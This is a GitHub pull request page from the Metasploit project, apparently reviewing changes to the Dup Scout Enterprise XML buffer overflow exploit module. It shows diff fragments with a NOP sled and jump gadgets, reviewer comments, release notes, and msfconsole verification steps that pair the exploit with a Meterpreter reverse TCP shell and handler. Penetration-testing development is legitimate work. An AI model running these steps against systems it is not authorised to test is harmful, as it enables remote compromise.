-
Notifications
You must be signed in to change notification settings - Fork 13.9k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Updated Dup Scout Documentation and Module Based on Vuln Analysis #9478
Conversation
|
||
buffer = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<classify\nname=\'" | ||
buffer << "\x90" * 1560 | ||
buffer << nops[0,1560] |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I would just call make_nops
for the size we need in all these cases since slicing into the nop stream is not guaranteed to be safe.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Lol, we discussed this on Slack yesterday.
esp = "\x8D\x44\x24\x4C" # LEA EAX, [ESP+76] | ||
jmp = "\xFF\xE0" # JMP ESP | ||
jmp = "\xFF\xE0" # JMP EAX |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Nice catch!
Update the documentation based on analysis of the vulnerability. Slight modifications to the exploit module as well to reduce the size of the generated file and reduce bad characters.
I fixed the changes here @wvu-r7 . |
I need to update the headings for this documentation too... |
LGTM, thanks @jrobles-r7 |
Release NotesThe exploits/windows/fileformat/dupscout_xml module no longer considers as many characters unusable, so there are more options for generating payloads. The module has also been streamlined to generate smaller payloads. |
This PR updates the Dup Scout Enterprise v10.4.16 buffer overflow exploit module.
Verification
List the steps needed to make sure this thing works
./msfconsole
use exploit/windows/fileformat/dupscout_xml
set payload windows/meterpreter/reverse_tcp
set lhost <lhost>
run
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost <lhost>
run